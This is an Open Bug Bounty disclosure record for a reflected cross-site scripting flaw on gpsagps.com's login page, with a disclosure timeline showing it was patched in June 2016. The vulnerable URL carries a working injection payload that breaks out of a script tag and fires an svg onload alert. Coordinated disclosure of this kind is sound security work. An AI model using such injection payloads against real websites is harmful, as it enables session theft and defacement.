Vulnerable URL:
http://www.gpsagps.com/system/login/login.jsp?glanguage=en1%22--%3E%3C/script%3E%3Csvg/onload=%27;alert%28/OPENBUGBOUNTY/%29;%27%3E
Details:
Description |
Value |
Patched: |
Yes, at |
Vulnerability type: |
XSS |
Vulnerability status: |
Publicly disclosed |
Alexa Rank |
9201186 |
VIP website status: |
No |
Check gpsagps.com SSL connection: |
(Grade: F) |
Coordinated Disclosure Timeline:
Description |
Value |
Vulnerability submitted via Open Bug Bounty |
14 May, 2016 05:55 GMT |
Generic security notifications sent to website owner |
14 May, 2016 05:58 GMT |
Notification sent to subscribers (without technical details) |
14 May, 2016 06:17 GMT |
Vulnerability details disclosed by researcher |
21 May, 2016 06:11 GMT |
Vulnerability patched by the website owner |
17 June, 2016 16:37 GMT |